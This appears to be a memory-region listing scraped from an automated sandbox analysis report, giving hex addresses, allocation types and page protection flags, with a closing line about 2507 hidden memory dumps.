heap
page read and write
2EBF000
stack
page read and write
24838000
heap
page read and write
24822000
heap
page read and write
37BBC000
heap
page read and write
726B000
stack
page read and write
450000
heap
page read and write
262C1318000
heap
page read and write
219F000
stack
page read and write
4B7E000
stack
page read and write
2484E000
heap
page read and write
2A8B4000
heap
page read and write
7580000
heap
page read and write
2924000
heap
page read and write
5398000
trusted library allocation
page read and write
4D6F000
stack
page read and write
74FD000
stack
page read and write
64B0000
trusted library allocation
page execute and read and write
D1A000
heap
page read and write
1E660000
heap
page read and write
321D000
trusted library allocation
page execute and read and write
765727E000
unkown
page readonly
8CF000
stack
page read and write
27E4000
direct allocation
page read and write
2BA4000
unkown
page read and write
5D53000
heap
page read and write
CF4000
heap
page read and write
2E91000
heap
page read and write
3212000
heap
page read and write
1701000
trusted library allocation
page read and write
2483C000
heap
page read and write
344D000
heap
page read and write
2D8E000
stack
page read and write
5D5C000
stack
page read and write
2924000
heap
page read and write
CBE000
heap
page read and write
34D2000
trusted library allocation
page read and write
EC2000
heap
page read and write
B30000
heap
page read and write
2F79000
heap
page read and write
2E91000
heap
page read and write
6E0000
heap
page read and write
3340000
heap
page read and write
846F000
stack
page read and write
2E91000
heap
page read and write
790000
unkown
page readonly
59E000
stack
page read and write
5D59000
heap
page read and write
2924000
heap
page read and write
DF5000
unkown
page write copy
32BF000
stack
page read and write
7510000
heap
page read and write
800000
heap
page read and write
32F9000
heap
page read and write
70C6000
heap
page read and write
80A000
unkown
page write copy
2924000
heap
page read and write
24840000
heap
page read and write
4720000
unkown
page read and write
2CB4000
heap
page read and write
2C4E000
heap
page read and write
2BA4000
unkown
page read and write
6F9E000
stack
page read and write
3618000
trusted library allocation
page read and write
344E000
trusted library allocation
page read and write
5DAD000
heap
page read and write
1360000
trusted library allocation
page read and write
7657E7B000
stack
page read and write
262C1400000
trusted library allocation
page read and write
76576FE000
stack
page read and write
3A10000
heap
page read and write
7621000
heap
page read and write
262BC260000
trusted library allocation
page read and write
68C29000
unkown
page write copy
57EE000
stack
page read and write
2484E000
heap
page read and write
43B9000
trusted library allocation
page read and write
E84000
heap
page read and write
306F000
stack
page read and write
375BC000
stack
page read and write
697000
heap
page read and write
7042000
heap
page read and write
278C000
direct allocation
page read and write
F18000
heap
page read and write
DCE000
stack
page read and write
418000
unkown
page write copy
77CE000
stack
page read and write
2E91000
heap
page read and write
870000
heap
page read and write
68AD0000
unkown
page readonly
5472000
unkown
page read and write
2160000
heap
page read and write
41E000
unkown
page write copy
650000
heap
page read and write
177E000
stack
page read and write
59C000
stack
page read and write
2B70000
heap
page read and write
630000
heap
page read and write
780000
heap
page read and write
765000
heap
page read and write
2485B000
heap
page read and write
2BA4000
unkown
page read and write
1760000
trusted library allocation
page read and write
3200000
trusted library allocation
page read and write
4180000
trusted library allocation
page read and write
418000
unkown
page write copy
2C8B000
heap
page read and write
5DBA000
heap
page read and write
7657EFE000
stack
page read and write
655000
heap
page read and write
66FE000
stack
page read and write
70A0000
heap
page read and write
5DC6000
heap
page read and write
30980000
heap
page read and write
766000
unkown
page read and write
105D6000
direct allocation
page readonly
5DBD000
heap
page read and write
3200000
trusted library allocation
page read and write
636000
unkown
page execute and read and write
790000
unkown
page readonly
EC7000
heap
page read and write
2E91000
heap
page read and write
2483D000
heap
page read and write
262BBC13000
heap
page read and write
5ED7000
heap
page read and write
218E000
stack
page read and write
600000
heap
page read and write
5DC2000
heap
page read and write
FCB000
stack
page read and write
32C6000
trusted library allocation
page read and write
334E000
stack
page read and write
635E000
stack
page read and write
68CB0000
unkown
page readonly
C90000
heap
page read and write
EAC000
heap
page read and write
6671000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
2CCB000
unkown
page read and write
375F000
trusted library allocation
page read and write
41C9000
trusted library allocation
page read and write
262C1243000
heap
page read and write
29CE000
stack
page read and write
2EC6000
heap
page read and write
449D000
trusted library allocation
page read and write
2924000
heap
page read and write
5DDE000
heap
page read and write
CC3000
heap
page read and write
7300000
heap
page read and write
2F7F000
heap
page read and write
5DCF000
heap
page read and write
EC7000
heap
page read and write
2F7F000
heap
page read and write
401000
unkown
page execute read
27CE000
direct allocation
page read and write
D33000
heap
page read and write
34F5000
trusted library allocation
page read and write
765638B000
stack
page read and write
791000
unkown
page execute read
3110000
trusted library allocation
page read and write
5DC7000
heap
page read and write
2C83000
heap
page read and write
2E91000
heap
page read and write
82F000
stack
page read and write
82F0000
trusted library allocation
page read and write
6D0000
unkown
page readonly
AA0000
heap
page read and write
3220000
heap
page read and write
4175000
trusted library allocation
page read and write
262BC370000
trusted library section
page read and write
9D0000
heap
page read and write
525E000
direct allocation
page read and write
EC6000
heap
page read and write
408A000
heap
page read and write
24854000
heap
page read and write
E7C000
unkown
page read and write
2924000
heap
page read and write
F09000
heap
page read and write
7BBD000
stack
page read and write
34BA000
trusted library allocation
page read and write
EEE000
stack
page read and write
35D0000
heap
page read and write
1E771000
heap
page read and write
EC9000
heap
page read and write
6750000
trusted library allocation
page read and write
2E91000
heap
page read and write
2484E000
heap
page read and write
24831000
heap
page read and write
6F5000
heap
page read and write
2F99000
heap
page read and write
1935000
heap
page read and write
2484E000
heap
page read and write
FEE000
stack
page read and write
3420000
heap
page read and write
2764000
direct allocation
page read and write
3297000
trusted library allocation
page read and write
5DEE000
stack
page read and write
78C000
stack
page read and write
ABE000
stack
page read and write
D04000
heap
page read and write
3CE6000
heap
page read and write
2DF0000
heap
page read and write
7F7E000
stack
page read and write
68E90000
unkown
page read and write
4A1C000
unkown
page read and write
3A27000
heap
page read and write
2924000
heap
page read and write
262C1450000
remote allocation
page read and write
37BA8000
heap
page read and write
24854000
heap
page read and write
5E02000
heap
page read and write
550000
heap
page read and write
13C8000
heap
page read and write
143E000
stack
page read and write
4397000
trusted library allocation
page read and write
5EE7000
heap
page read and write
36A20000
trusted library allocation
page read and write
1743000
trusted library allocation
page read and write
2C30000
unkown
page read and write
41C0000
heap
page read and write
3724000
trusted library allocation
page read and write
DFE000
unkown
page readonly
39C000
stack
page read and write
2950000
heap
page read and write
262C1311000
heap
page read and write
2FED000
trusted library allocation
page execute and read and write
92F000
stack
page read and write
7A40000
heap
page read and write
2BA4000
unkown
page read and write
282F000
unkown
page read and write
2E91000
heap
page read and write
791000
unkown
page execute read
76F000
unkown
page read and write
768A000
stack
page read and write
14A4000
heap
page read and write
435F000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
7087000
heap
page read and write
6DF000
stack
page read and write
2924000
heap
page read and write
5DBD000
heap
page read and write
281D000
direct allocation
page read and write
88E000
stack
page read and write
346C000
trusted library allocation
page read and write
7053000
heap
page read and write
74F0000
heap
page execute and read and write
2F87000
heap
page read and write
2924000
heap
page read and write
312B000
heap
page read and write
1D6E000
stack
page read and write
298A000
heap
page read and write
2485C000
heap
page read and write
10000000
direct allocation
page read and write
40A000
unkown
page write copy
7E7E000
stack
page read and write
61F000
heap
page read and write
401000
unkown
page execute read
9A000
stack
page read and write
2484F000
heap
page read and write
2924000
heap
page read and write
38B0000
heap
page read and write
5EBD000
heap
page read and write
6465000
trusted library allocation
page read and write
5DDE000
heap
page read and write
1A2F000
stack
page read and write
41F9000
trusted library allocation
page read and write
6BC000
heap
page read and write
ED8000
heap
page read and write
262C133C000
heap
page read and write
716A000
stack
page read and write
4148000
trusted library allocation
page read and write
3210000
heap
page read and write
5DDE000
heap
page read and write
378FC000
stack
page read and write
3278000
heap
page read and write
37BB2000
heap
page read and write
7AF000
stack
page read and write
3434000
trusted library allocation
page read and write
69D000
heap
page read and write
408E000
heap
page read and write
6A2000
heap
page read and write
2485C000
heap
page read and write
6220000
trusted library allocation
page read and write
1380000
trusted library allocation
page read and write
422000
unkown
page write copy
2924000
heap
page read and write
E7A000
unkown
page read and write
2E91000
heap
page read and write
35FE000
trusted library allocation
page read and write
C10000
heap
page read and write
2EC0000
heap
page read and write
15AF000
stack
page read and write
4D62000
unkown
page read and write
27DE000
unkown
page read and write
5DBA000
heap
page read and write
5D61000
heap
page read and write
DFE000
unkown
page readonly
276C000
stack
page read and write
171A000
heap
page read and write
12E0000
heap
page read and write
32F7000
heap
page read and write
31EE000
stack
page read and write
329D000
stack
page read and write
2E91000
heap
page read and write
43CE000
trusted library allocation
page read and write
BAF000
stack
page read and write
2C10000
heap
page read and write
21F0000
heap
page read and write
14A1000
heap
page read and write
D02000
heap
page read and write
2483B000
heap
page read and write
482A000
unkown
page read and write
1765000
trusted library allocation
page read and write
5DC2000
heap
page read and write
72D0000
trusted library allocation
page execute and read and write
2C6C000
heap
page read and write
3232000
heap
page read and write
400000
unkown
page readonly
2BA4000
unkown
page read and write
59BB000
stack
page read and write
There are 2507 hidden memdumps, click here to show them.